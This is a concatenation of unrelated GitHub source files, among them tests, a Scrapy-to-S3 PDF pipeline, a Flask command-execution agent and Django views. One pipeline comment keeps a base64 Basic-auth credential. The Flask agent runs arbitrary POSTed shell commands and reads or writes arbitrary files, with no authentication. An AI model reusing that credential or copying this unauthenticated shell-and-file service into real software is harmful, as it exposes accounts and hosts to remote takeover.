\"Impossible\")","repo_name":"lookinmin/CodingTest","sub_path":"그래프/BOJ_1963.py","file_name":"BOJ_1963.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6482375932","text":"from pathlib import Path\n\nimport pytest\n\nimport exam2pdf.rlwrapper\nfrom exam2pdf.rlwrapper import get_std_aspect_image\n\n\ndef test_get_image_error(mocker):\n \"\"\"Argument size invalid.\"\"\"\n # Arrange\n # Mock where it is used, and not where it’s defined (source)\n mocker.patch(\n \"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1)\n ) # my function is mocked\n mocker.patch(\n \"exam2pdf.rlwrapper.platypus.Image\"\n ) # library is mocked, Don’t Mock What You Don’t Own\n\n # Act, Assert\n with pytest.raises(ValueError):\n get_std_aspect_image(Path(\"any file\"), size=\"hello world\")\n\n\ndef test_get_image_x1(mocker):\n \"\"\"Test half size image.\"\"\"\n # Arrange\n # Mock where it is used, and not where it’s defined (source)\n # In both cases I mocked my functions\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked_get_RL_image = mocker.patch.object(\n exam2pdf.rlwrapper, \"get_RL_image\"\n )\n\n # Act\n get_std_aspect_image(Path(\"any file\"), size=\"x 1\")\n\n # Assert\n mocked_get_RL_image.assert_called_once_with(\n Path(\"any file\"), width=1, height=1\n )\n\n\ndef test_get_image_x05(mocker):\n \"\"\"Test half size image.\"\"\"\n # Arrange\n\n # Mock where it is used, and not where it’s defined (source)\n # This time, as exercise see Stackoverflow 3 July my question, library is mocked,\n mock_image_reader = mocker.patch(\n \"exam2pdf.rlwrapper.utils.ImageReader\", spec_set=True\n )\n mock_image_reader.return_value.getSize.return_value = 1, 1\n\n mocker.patch(\"exam2pdf.rlwrapper.platypus.Image\")\n\n # Act\n get_std_aspect_image(Path(\"aabbcc\"), size=\"x 0.5\")\n\n # Assert\n exam2pdf.rlwrapper.platypus.Image.assert_called_once_with(\n Path(\"aabbcc\"), width=0.5, height=0.5\n )\n\n\ndef test_get_image_w(mocker):\n \"\"\"Test width 2: 2 * 0.5 mm = 1\"\"\"\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked = mocker.patch.object(exam2pdf.rlwrapper, \"get_RL_image\")\n mocker.patch.object(exam2pdf.rlwrapper, \"mm\", 0.5)\n get_std_aspect_image(Path(\"any file\"), size=\"w 2\")\n mocked.assert_called_once_with(Path(\"any file\"), width=1, height=1)\n\n\ndef test_get_image_h(mocker):\n \"\"\" \"Test height 3: 3 * 0.5 mm = 1.5\"\"\"\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked = mocker.patch.object(exam2pdf.rlwrapper, \"get_RL_image\")\n mocker.patch.object(exam2pdf.rlwrapper, \"mm\", 0.5)\n get_std_aspect_image(Path(\"any file\"), size=\"height3\")\n mocked.assert_called_once_with(Path(\"any file\"), width=1.5, height=1.5)\n","repo_name":"agossino/exam2pdf","sub_path":"tests/unit/test_rlwrapper.py","file_name":"test_rlwrapper.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18288589478","text":"import boto3\nimport datetime\nimport hashlib\nimport pdfkit\nimport sqlite3\nimport json\nimport time\nimport logging\nimport requests\nfrom crawlerapp.models import Movies,ProjectDetail\n\n\npath=r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path)\nfrom botocore.client import Config\n\nfrom .settings import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, FILE_PATH, DB_PATH\n\nfrom .html_format import html_format_t\n\nlogger = logging.getLogger()\n\n\nclass ScrappingapplicationPipeline:\n must_haves = [\n # 'title', 'production_companies', 'locations'\n ]\n def process_item(self, item, spider):\n for field in self.must_haves:\n if not item.get(field):\n logger.warning(f'Droping item because {field} is not available!')\n return {}\n \n return item\n\n\n# This pipeline takes the Item and convert it into PDF and save content in DB\nclass ScrappingSqLitePipeline(object):\n # Take the item and put it in database - do not allow duplicates\n def process_item(self, item, spider):\n moviev=Movies()\n project=ProjectDetail()\n moviev.title=item['title']\n id=moviev.save()\n print(\"iddd\")\n print(id)\n item=self.fix_movie_info(item)\n if 'issue_num' in item:\n if item['issue_num']==\"\":\n item['issue_num']=id\n result=ProjectDetail.objects.filter(title=item['title'])\n if len(result)>0:\n for feild in ProjectDetail._meta.get_fields():\n if getattr(result[0], feild.name) == None or getattr(result[0], feild.name) == [] or getattr(result[0],feild.name) == '[\"\"]' or getattr(result[0], feild.name) == \"\" or getattr(result[0], feild.name) == \"N/A\":\n print(feild.name)\n if item[feild.name]!=None or item[feild.name]!=[\"\"] or item[feild.name]!=[] or item[feild.name]!='[\"\"]' or item[feild.name]!=\"\":\n if feild.name == 'project_id':\n if 'id' in item:\n setattr(result[0], 'project_id', item['id'])\n else:\n setattr(result[0], 'project_id', id)\n else:\n setattr(result[0],feild.name,item[feild.name])\n result[0].save()\n else:\n with open('ScrappingApplication/findfilmwork.json') as f:\n data = json.load(f)\n output_dict = [x for x in data if x['title'] == item['title']]\n if len(output_dict)>0:\n filmdata=output_dict[0]\n print(filmdata)\n project=ProjectDetail()\n for field in ProjectDetail._meta.get_fields():\n if len(output_dict)>0:\n print(\"function call\")\n if field.name == 'project_id':\n setattr(project, 'project_id', filmdata['id'])\n else:\n if field.name in filmdata:\n setattr(project, field.name, filmdata[field.name])\n else:\n if field.name in item:\n if field.name=='project_id':\n if 'id' in item:\n setattr(project, 'project_id', item['id'])\n else:\n setattr(project, 'project_id', id)\n else:\n if isinstance(item[field.name],list):\n setattr(project,field.name,json.dumps(item[field.name]))\n else:\n setattr(project,field.name,item[field.name])\n project.save()\n # item['issue_num'] = id\n # project.url=item['url']\n # project.project_id=item['id']\n # project.title=item['title']\n # project.aka_title=item['aka_title']\n # project.project_type=item['project_type']\n # project.project_issue_date=item['project_issue_date']\n # project.project_issue_date1=item['project_issue_date1']\n # project.project_start_date=item['project_start_date']\n # if 'project_update' in item:\n # project.project_update=item['project_update']\n # project.locations=json.dumps(item['locations'])\n # project.photography_start_date=item['photography_start_date']\n # project.writers=json.dumps(item['writers'])\n # project.directors=json.dumps(item['directors'])\n # project.cast=json.dumps(item['cast'])\n # project.producers=json.dumps(item['producers'])\n # project.production_companies=json.dumps(item['production_companies'])\n # project.studios=json.dumps(item['studios'])\n # project.plot=item['plot'][0]\n # project.genres=json.dumps(item['genres'])\n # if 'project_notes' in item:\n # project.project_notes=str(item['project_notes'])\n # project.release_date=item['release_date']\n # project.start_wrap_schedule=item['start_wrap_schedule']\n # project.issue_num=item['issue_num']\n # project.save()\n # logger.info(\"Item saved in db!\")\n # print(\"items\")\n time.sleep(3)\n print(item)\n return item\n\n def fix_movie_info(self, movie):\n new_movie = movie.copy()\n\n if not movie.get('project_issue_date'):\n new_movie['project_issue_date'] = movie.get('release_date', 'N\\A')\n\n if not new_movie.get('project_start_date'):\n new_movie['project_start_date'] = movie.get('project_issue_date', 'N\\A')\n\n current_date = datetime.datetime.now().strftime('%d %B %Y')\n new_movie['project_issue_date1'] = movie.get('project_issue_date', 'N\\A')\n new_movie['batch_no'] = hashlib.sha224(str(current_date).encode('utf-8')).hexdigest()[:8]\n new_movie['letter_creation_date'] = current_date\n\n return new_movie\n\n\n\nclass ScrappingPDFGeneratorPipeline:\n fields_to_end_with_br = [\n 'genres','locations', 'producers',\n 'writers', 'directors', 'cast'\n ]\n fields_to_join = [\n (',', 'plot'),\n (' -', 'cast'),\n (',', 'genres'), \n (' -', 'studios'), \n (' -', 'writers'),\n (' -', 'directors'),\n (' -', 'producers'),\n (' -', 'locations'),\n (',', 'production_companies'),\n \n ]\n\n def join_fields(self, value, joiner):\n if isinstance(value, list):\n return f'{joiner} '.join(value)\n return value\n \n def fix_movie_info(self, movie):\n new_movie = movie.copy()\n \n if not movie.get('project_issue_date'):\n new_movie['project_issue_date'] = movie.get('release_date', 'N\\A')\n\n if not new_movie.get('project_start_date'):\n new_movie['project_start_date'] = movie.get('project_issue_date', 'N\\A')\n \n current_date = datetime.datetime.now().strftime('%d %B %Y')\n new_movie['project_issue_date1'] = movie.get('project_issue_date', 'N\\A')\n new_movie['batch_no'] = hashlib.sha224(str(current_date).encode('utf-8')).hexdigest()[:8]\n new_movie['letter_creation_date'] = current_date\n \n return new_movie\n\n def upload_file(self, file_path, file_name):\n end_point_url = 'https://s3.eu-west-2.amazonaws.com'\n credentials = {\n 'aws_access_key_id': AWS_ACCESS_KEY_ID, \n 'aws_secret_access_key': AWS_SECRET_ACCESS_KEY\n }\n s3_client = boto3.client('s3', region_name='eu-west-2', endpoint_url=end_point_url, config=Config(signature_version='s3v4'), **credentials)\n \n try:\n with open(file_path, \"rb\") as f:\n s3_client.upload_fileobj(f, \"wppdfupload\", file_name)\n\n # response = requests.post(url=resp, files={file_name: open(file_path, 'rb')})\n logger.info(\"Uploading file Successfully on S3 bucket\")\n \n file_url_on_s3 = f'https://wppdfupload.s3.amazonaws.com/{file_name}'\n logger.info(\"URL is Generated!\")\n\n req_url = \"https://productiontelegram.com/wp-json/api-k/v1/pdf-links/\"\n headers = {}\n headers['Content-Type'] = \"application/json\"\n # headers['Authorization'] = \"Basic dGhlbWFjaGluZTpDdW1ZVmFCYnJQNHQ2S21tRWtZNUdOd3Y=\"\n headers['cache-control'] = \"no-cache\"\n # headers['Postman-Token'] = \"ab5a85de-2184-4b07-9d72-8016f6786735\"\n \n \n payload = {}\n payload['file_name'] = file_name\n payload['file_link'] = file_url_on_s3\n payload['description'] = 'N/A'\n # payload = f\"{{\\n\\t\\\"file_name\\\": \\\"{file_name}\\\",\\n\\t\\\"file_link\\\": \\\"{signed_url}\\\",\\n\\t\\\"description\\\": \\\"Testing file\\\"\\n}}\"\n \n r = requests.post(url=req_url, data=json.dumps(payload), headers=headers)\n \n if r.status_code == 200:\n logger.info(\"Uploading file Successfully on Website!\")\n return True\n logger.warning(\"Uploading file Unsuccessfully\")\n except Exception as e:\n return False\n\n def process_item(self, item, spider):\n if not item:\n return {}\n \n movie = item.copy()\n\n for joiner, field in self.fields_to_join:\n movie[field] = self.join_fields(movie[field], joiner)\n\n for field in self.fields_to_end_with_br:\n if movie[field]:\n movie[field] = f'{movie[field]}
    '\n\n \n name_hash = hashlib.sha224(str(item['title']).encode('utf-8')).hexdigest()[:8]\n file_name = f'{name_hash}.pdf'\n file_path = f'{FILE_PATH}/{file_name}'\n \n movie['listing'] = name_hash\n\n movie = self.fix_movie_info(movie)\n \n html = html_format_t.format(**movie)\n pdfkit.from_string(html, file_path,configuration=config)\n\n if self.upload_file(file_path, file_name):\n logger.info(\"Uploading file Successfully\")\n else:\n logger.warning(\"Uploading file Unsuccessfully\")\n\n return item\n","repo_name":"Ahmadch101/webcrawler","sub_path":"ScrappingApplication/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":10256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"190616482","text":"from flask import Flask, jsonify, request\nfrom flask import send_file, send_from_directory\nimport json\nimport subprocess\nfrom subprocess import PIPE, STDOUT\nimport threading\nimport requests\nimport os\nimport time\nimport copy\nimport redis\nimport re\n\napp = Flask(__name__)\n\nBASE_URL = '/api/v1/'\n\nagent_finish_flag = \"Agent Command Execution Finished\"\n\nbase_dir = os.path.dirname(__file__)\nstdout_log_file_pattern = os.path.join(base_dir, \"log\", \"{}-out.log\")\n\nglobal_task_id = 0\ntask_list = dict()\n\n\nclass RealTimeLog:\n def __init__(self, log_file_fd, redis_url=None, log_key=None, skip_if_matchs=None):\n '''\n set skip_if_match = [\"^Progress \\(\\d\\):\"] if run mvn command\n '''\n\n self._client = None\n self.skip_if_matchs = list()\n for mat in self.skip_if_matchs:\n self.skip_if_matchs.append(re.compile(mat))\n\n if redis_url and log_key:\n self.redis_url = redis_url\n if log_key.find(\"agent_log:\") == -1:\n log_key = \"agent_log:{}\".format(log_key)\n self.log_key = log_key\n self._ttl = 12 * 60 * 60\n # self._pool = redis.ConnectionPool.from_url(redis_url)\n # self._client = redis.StrictRedis(connection_pool=self._pool)\n self._client = redis.from_url(redis_url)\n try:\n self._client.ping()\n except:\n print(\"Redis is unreachable!! Redis real-time log is disabled!!\")\n self._client = None\n self.log_file_fd = log_file_fd\n\n if self._client:\n self._client.rpush(self.log_key, \"Start\")\n self.log_file_fd.write(\"Start\\n\")\n\n def refresh_expire_time(self):\n if self._client:\n self._client.expire(self.log_key, self._ttl)\n\n def write_redis(self, line):\n if self._client:\n self._client.rpush(self.log_key, line)\n\n def write_log(self, lines):\n try:\n if not isinstance(lines, list):\n lines = [lines]\n for line in lines:\n if isinstance(line, bytes):\n line = line.decode()\n line = line.strip()\n skip = False\n for re_mat in self.skip_if_matchs:\n if re_mat.match(line):\n skip = True\n break\n if skip is True:\n continue\n self.write_redis(line)\n self.log_file_fd.write(line+\"\\n\")\n except Exception as e:\n print(e)\n\n\ndef callback(task_id, url, body, retry=True):\n headers = {'Content-Type': 'application/json'}\n count_left = 20\n interval = 6\n while True:\n stop = False\n try:\n _response = requests.post(url, json=body, headers=headers, timeout=10)\n task_list[task_id][\"callback_status\"] = _response.status_code\n if _response.status_code / 100 == 2:\n stop = True\n elif _response.status_code / 100 == 4:\n stop = True\n except Exception as e:\n print(\"Can not send call back: {}\".format(e))\n task_list[task_id][\"callback_status\"] = str(e)\n finally:\n if not retry:\n break\n if stop:\n break\n if count_left <= 0:\n break\n count_left -= 1\n time.sleep(interval)\n\n\ndef read_log_file(path, offset=0, count=None):\n file_size = os.path.getsize(path)\n if isinstance(offset, bytes):\n offset = int(offset.decode())\n elif isinstance(offset, str):\n offset = int(offset)\n if not count:\n count = file_size - offset\n elif isinstance(count, bytes):\n count = int(count.decode())\n elif isinstance(count, str):\n count = int(count)\n\n log_list = list()\n recv_size = 0\n\n with open(path, 'r') as o:\n if offset:\n o.seek(offset)\n unit_size = 1024 if count > 1024 else count\n d = o.read(unit_size)\n while d:\n if isinstance(d, bytes):\n d = d.decode()\n log_list.append(d)\n recv_size += len(d)\n if recv_size >= count:\n break\n d = o.read(unit_size)\n return \"\".join(log_list)\n\n\ndef run_thread(task_id, command, callback_url):\n log_redis_key = task_list[task_id].get(\"log_redis_key\", None)\n log_redis_url = task_list[task_id].get(\"log_redis_url\", None)\n stdout_log_file = stdout_log_file_pattern.format(task_id)\n task_list[task_id][\"stdout_file\"] = stdout_log_file\n outfile = open(stdout_log_file, 'w')\n realtime_logger = RealTimeLog(outfile, log_redis_url, log_redis_key)\n\n process = subprocess.Popen(command, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, shell=True, bufsize=0,\n universal_newlines=True)\n # return_code = child.wait(timeout=12*60*60)\n\n while True:\n output = process.stdout.readline()\n if not output and process.poll() is not None:\n break\n if output:\n # print(\"{} stdout: {}\".format(time.time(), output))\n realtime_logger.write_log(output)\n\n return_code = process.wait()\n\n realtime_logger.write_log(agent_finish_flag)\n realtime_logger.refresh_expire_time()\n outfile.flush()\n outfile.close()\n\n print(\"Command return code: {}\".format(return_code))\n task_list[task_id][\"status\"] = \"done\"\n task_list[task_id][\"return_code\"] = return_code\n task_list[task_id][\"finish_time\"] = time.time()\n task_list[task_id][\"duration\"] = task_list[task_id][\"finish_time\"] - \\\n task_list[task_id][\"start_time\"]\n\n out_log = read_log_file(stdout_log_file)\n if return_code != 0:\n out_log = out_log[-4000:]\n else:\n out_log = out_log[-1000:]\n\n if callback_url:\n cb_body = {\n \"return_code\": return_code,\n \"stdout\": out_log,\n \"extra\": task_list[task_id][\"extra\"],\n \"key\": task_list[task_id][\"key\"],\n \"duration\": task_list[task_id][\"duration\"]\n }\n if realtime_logger:\n cb_body[\"log_key\"] = log_redis_key\n callback(task_id, callback_url, cb_body)\n\n\ndef handle_task(command, callback_url, extra, key,\n log_redis_key, log_redis_url):\n global global_task_id\n global_task_id += 1\n t_id = global_task_id\n task_list[t_id] = dict()\n task_list[t_id][\"task_id\"] = t_id\n task_list[t_id][\"command\"] = command\n task_list[t_id][\"extra\"] = extra\n task_list[t_id][\"key\"] = key\n task_list[t_id][\"callback_url\"] = callback_url\n task_list[t_id][\"status\"] = \"doing\"\n task_list[t_id][\"start_time\"] = time.time()\n if log_redis_key and log_redis_url:\n task_list[t_id][\"log_redis_key\"] = log_redis_key\n task_list[t_id][\"log_redis_url\"] = log_redis_url\n\n t = threading.Thread(target=run_thread,\n args=(t_id, command, callback_url))\n t.start()\n t.setName(\"Handle_task_{}\".format(t_id))\n print(t.getName())\n task_list[t_id][\"thread_name\"] = t.getName()\n return t_id\n\n\n@app.route(BASE_URL + 'tasks', methods=['GET', 'POST'])\ndef tasks():\n if request.method == 'GET':\n global task_list\n t_id = request.args.get(\"task_id\", None)\n offset = request.args.get(\"offset\", 0)\n count = request.args.get(\"count\", None)\n if t_id:\n t_id = int(t_id)\n info = copy.deepcopy(task_list[t_id])\n info[\"stdout\"] = read_log_file(info[\"stdout_file\"],\n offset, count)\n resp = {t_id: info}\n else:\n resp = task_list\n return jsonify(resp), 200\n\n elif request.method == 'POST':\n body = request.json\n if not body and request.data:\n print(request.data)\n body = json.loads(request.data)\n print(body)\n if not body:\n resp = {\n \"status\": \"error\",\n \"info\": \"No request body!!\"\n }\n return jsonify(resp), 400\n\n callback_url = body.get(\"callback_url\", None)\n command = body.get(\"command\", None)\n key = body.get(\"key\", None)\n extra = body.get(\"extra\", None)\n log_redis_key = body.get(\"log_redis_key\", key)\n log_redis_url = body.get(\"log_redis_url\", None)\n\n if not command:\n resp = {\n \"status\": \"error\",\n \"info\": \"No command!!\"\n }\n return jsonify(resp), 400\n\n t_id = handle_task(command, callback_url, extra, key,\n log_redis_key, log_redis_url)\n resp = {\n \"status\": \"created\",\n \"task_id\": t_id\n }\n return jsonify(resp), 201\n\n\n@app.route(BASE_URL + 'file', methods=['GET', 'POST'])\ndef file():\n if request.method == 'GET':\n file_path = request.args.get(\"file_path\", None)\n if not file_path:\n resp = {\n \"status\": \"error\",\n \"info\": \"No file_path!!\"\n }\n return jsonify(resp), 400\n if not os.path.isfile(file_path):\n resp = {\n \"status\": \"error\",\n \"info\": \"file {} not found in agent fs!!\".format(file_path)\n }\n return jsonify(resp), 404\n\n\n file_dir = os.path.dirname(file_path)\n file_name = os.path.basename(file_path)\n return send_from_directory(file_dir, file_name, as_attachment=True)\n\n elif request.method == 'POST':\n file = request.files['file']\n target_path = request.form.get(\"target_path\", None)\n if not target_path:\n resp = {\n \"status\": \"error\",\n \"info\": \"No target_path!!\"\n }\n return jsonify(resp), 400\n\n print(request.files)\n file.save(target_path)\n resp = {\n \"status\": \"success\"\n }\n return jsonify(resp), 201\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000, debug=False)\n","repo_name":"GodQ/py-rest-agent","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41790463027","text":"#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n#from aiy.vision.pins import PIN_A\nfrom aiy.vision.pins import (PIN_A, PIN_B, PIN_C, PIN_D)\n\nGPIO.setmode(GPIO.BOARD)\n\ncontrol_pins = [PIN_A,PIN_B,PIN_C,PIN_D]\n\nfor pin in control_pins:\n\tGPIO.setup(pin, GPIO.OUT)\n\tGPIO.output(pin,0)\n\nhalfstep_seq = [\n\t[1,0,0,0],\n\t[1,1,0,0],\n\t[0,1,0,0],\n\t[0,1,1,0],\n\t[0,0,1,0],\n\t[0,0,1,1],\n\t[0,0,0,1],\n\t[1,0,0,1]\n]\n\nfor i in range(512):\n\tfor halfstep in range(8):\n\t\tfor pin in range(4):\n\t\t\tGPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\n\t\ttime.sleep(0.001)\n\nGPIO.cleanup()\n\n\n","repo_name":"AlanWilms/iTracking","sub_path":"iTracking/gpiozero/test_stepper.py","file_name":"test_stepper.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40432191140","text":"import torch\nimport torch.nn as nn\n\nfrom pathlib import Path\n\nfrom eval.visualization_functions import save_class_activation_images\n\nfrom eval.gradcam import GradCam\n\nfrom PIL import Image\n\nfrom torchvision.datasets import CIFAR100\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\n\nfrom models.resnet import resnet34_cifar100\n\n\ndef load_model(model, ckpt_dir):\n assert isinstance(model, nn.Module)\n save_dict = torch.load(ckpt_dir)\n model.load_state_dict(save_dict['model_state_dict'])\n\n\ndef make_grad_cam_imgs(model, name, data_root=None):\n assert isinstance(model, nn.Module)\n\n grad_cam = GradCam(model, target_layer='layer4', target_conv='conv2')\n\n data_root = '/home/veritas/PycharmProjects/PA1/data'\n\n val_dataset = CIFAR100(root=data_root, train=False)\n\n for idx, (image, target) in enumerate(val_dataset, start=1):\n print(target)\n tensor = (ToTensor()(image)).unsqueeze(dim=0)\n print(tensor.shape)\n cam = grad_cam.generate_cam(input_image=tensor, target_class=target)\n save_class_activation_images(org_img=image, activation_map=cam, file_name=f'{name}_{idx:02d}')\n\n if idx >= 10:\n break\n\n\ndef main():\n resnet = resnet34_cifar100()\n ckpt_dir = '/home/veritas/PycharmProjects/PA1/checkpoints/Trial 01 2019-05-10 00-00-27/ckpt_018.tar'\n load_model(resnet, ckpt_dir)\n make_grad_cam_imgs(resnet, name='resnet34')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"veritas9872/PA1","sub_path":"eval/use_gradcam.py","file_name":"use_gradcam.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71265093547","text":"from jinja2.utils import contextfunction\n\nfrom shoop.core.models import (\n AttributeVisibility, Product, ProductAttribute, ProductCrossSell,\n ProductCrossSellType\n)\n\n\ndef get_visible_attributes(product):\n return ProductAttribute.objects.filter(\n product=product,\n attribute__visibility_mode=AttributeVisibility.SHOW_ON_PRODUCT_PAGE\n )\n\n\n# Deprecated, see `get_product_cross_sells()`\n@contextfunction\ndef get_products_bought_with(context, product, count=5):\n related_product_cross_sells = (\n ProductCrossSell.objects\n .filter(product1=product, type=ProductCrossSellType.COMPUTED)\n .order_by(\"-weight\")[:(count * 4)])\n products = []\n for cross_sell in related_product_cross_sells:\n product2 = cross_sell.product2\n if product2.is_visible_to_user(context[\"request\"].user) and product2.is_list_visible():\n products.append(product2)\n if len(products) >= count:\n break\n return products\n\n\n@contextfunction\ndef is_visible(context, product):\n request = context[\"request\"]\n shop_product = product.get_shop_instance(shop=request.shop)\n for error in shop_product.get_visibility_errors(customer=request.customer): # pragma: no branch\n return False\n return True\n\n\n@contextfunction\ndef get_product_cross_sells(context, product, relation_type=\"related\", count=4):\n request = context[\"request\"]\n rtype = ProductCrossSellType.RELATED\n if relation_type == \"computed\":\n rtype = ProductCrossSellType.COMPUTED\n elif relation_type == \"recommended\":\n rtype = ProductCrossSellType.RECOMMENDED\n\n related_product_ids = list((\n ProductCrossSell.objects\n .filter(product1=product, type=rtype)\n .order_by(\"weight\")[:(count * 4)]).values_list(\"product2_id\", flat=True)\n )\n\n related_products = list(\n Product.objects\n .filter(id__in=related_product_ids)\n .list_visible(shop=request.shop, customer=request.customer)\n )\n\n # Order related products by weight. Related product ids is in weight order.\n # If same related product is linked twice to product then lowest weight stands.\n related_products.sort(key=lambda prod: list(related_product_ids).index(prod.id))\n\n return related_products[:count]\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/front/template_helpers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318951700","text":"def dfs(idx, money):\n global cnt\n if money < 0:\n return\n if idx == k:\n if money == 0:\n cnt += 1\n else:\n for i in range(0, d[idx][1] + 1):\n dfs(idx + 1, money - (d[idx][0] * i))\n\n\nt = int(input())\nk = int(input())\nd = []\nfor _ in range(k):\n d.append(tuple(map(int, input().split())))\n\ncnt = 0\ndfs(0, t)\nprint(cnt)","repo_name":"castle-joooun/algorithm_python","sub_path":"inflearn/algorithm/7/7-4.py","file_name":"7-4.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35632553260","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom .models import Course\nfrom .forms import CourseModelForm\n\n\nclass CourseObjectMixin(object):\n model = Course\n lookup = 'id'\n\n def get_object(self):\n id = self.kwargs.get(self.lookup)\n obj = None\n if id is not None:\n obj = get_object_or_404(self.model, id=id)\n return obj\n\n\nclass CourseDeleteView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_delete.html'\n\n def get(self, request, id=None, *args, **kwargs):\n # GET method\n context = {}\n obj = self.get_object()\n if obj is not None:\n context['object'] = obj\n return render(request, self.template_name, context)\n\n def post(self, request, id=None, *args, **kwargs):\n # POST method\n context = {}\n obj = self.get_object()\n if obj is not None:\n obj.delete()\n context['object'] = None\n return redirect('/courses')\n return render(request, self.template_name, context)\n\n\nclass CourseUpdateView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_update.html'\n\n def get(self, request, id=None, *args, **kwargs):\n # GET method\n context = {}\n obj = self.get_object()\n if obj is not None:\n form = CourseModelForm(instance=obj)\n context['object'] = obj\n context['form'] = form\n return render(request, self.template_name, context)\n\n def post(self, request, id=None, *args, **kwargs):\n # POST method\n context = {}\n obj = self.get_object()\n if obj is not None:\n form = CourseModelForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n context['object'] = obj\n context['form'] = form\n return render(request, self.template_name, context)\n\n\nclass CourseCreateView(View): # Base View class = View\n template_name = 'course_create.html'\n\n def get(self, request, *args, **kwargs):\n # GET method\n form = CourseModelForm()\n context = {\"form\": form}\n return render(request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n # POST method\n form = CourseModelForm(request.POST)\n if form.is_valid():\n form.save()\n form = CourseModelForm()\n context = {\"form\": form}\n return render(request, self.template_name, context)\n\n\nclass CourseListView(View): # Base View class = View\n template_name = 'course_list.html'\n queryset = Course.objects.all()\n\n def get_queryset(self):\n return self.queryset\n\n def get(self, request, *args, **kwargs):\n context = {'object_list': self.get_queryset()}\n print(context)\n return render(request, self.template_name, context)\n\n\nclass MyListView(CourseListView):\n queryset = Course.objects.filter(id=1)\n\n\nclass CourseView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_detail.html'\n\n def get(self, request, id=None, *args, **kwargs):\n context = {'object': self.get_object()}\n # if id is not None:\n # obj = get_object_or_404(Course, id=id)\n # context['object'] = obj\n return render(request, self.template_name, context)\n\n\n# # HTTP METHODS\ndef my_fbv(request, *args, **kwargs):\n template = 'about.html'\n return render(request, template, {})\n\n\n\n","repo_name":"kirankotari/tryDjango","sub_path":"src/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71828996588","text":"import cv2\nimport os\n\npath = \"D:/Project/MachineLearning/NhanDienLogo/datasets/Logo/\"\ndir = path + \"images/\"\n\nsize = []\n\nfile = os.listdir(dir+\"/\")\nj = 0\nfor i in file:\n print(j, \" - \", len(file))\n img = cv2.imread(dir+i, cv2.IMREAD_UNCHANGED)\n try:\n s = img.shape\n w, h = s[0], s[1]\n if w not in size:\n size.append(w)\n if h not in size:\n size.append(h)\n except:\n pass\n j += 1\n\nprint(max(size), min(size))\n\n","repo_name":"ttsbao/NhanDienLogo","sub_path":"checksize.py","file_name":"checksize.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10403737216","text":"#!/usr/bin/env python\n#\n# Add\n## Upvote\n## Downvote\n# Remove\n# \n#\nimport webapp2\nimport logging, json\nfrom datetime import datetime\nfrom src import rank, config\nfrom webapp2_extras import jinja2, sessions\nfrom src.entities import post as post1\nfrom src.jinja2_factory import jinja2_factory\nimport random\n\nclass BaseHandler(webapp2.RequestHandler):\n\n @webapp2.cached_property\n def jinja2(self):\n return jinja2.get_jinja2(factory=jinja2_factory)\n \n def render_response(self, filename, **template_args):\n self.response.write(self.jinja2.render_template(filename, **template_args))\n \n def dispatch(self):\n # Get a session store for this request\n self.session_store = sessions.get_store(request = self.request)\n \n try:\n # Dispatch request\n webapp2.RequestHandler.dispatch(self)\n finally:\n # Save all sessions\n self.session_store.save_sessions(self.response)\n \n @webapp2.cached_property\n def session(self):\n # Return a session using the default cookie key\n return self.session_store.get_session()\n \nclass MainHandler(BaseHandler):\n def get(self):\n list = post1.Post().get_by_score()\n \n try:\n status = self.session.get_flashes('status')[0][0]\n flash = self.session.get_flashes('message')[0][0]\n except IndexError: \n status, flash = None, None\n self.render_response('index.html', list=list, status=status, flash=flash)\n \nclass PostHandler(BaseHandler):\n def post(self):\n if(self.session.get('authorized') == 'True'):\n p1 = post1.Post()\n p1.populate(title=self.request.get('title'),\n description = self.request.get('description'),\n upvotes = int(round(random.random() * 100)),\n downvotes = int(round(random.random() * 100)),\n date_posted = datetime.now())\n p1.put()\n self.session.add_flash('alert alert-success', key='status')\n self.session.add_flash('Posted 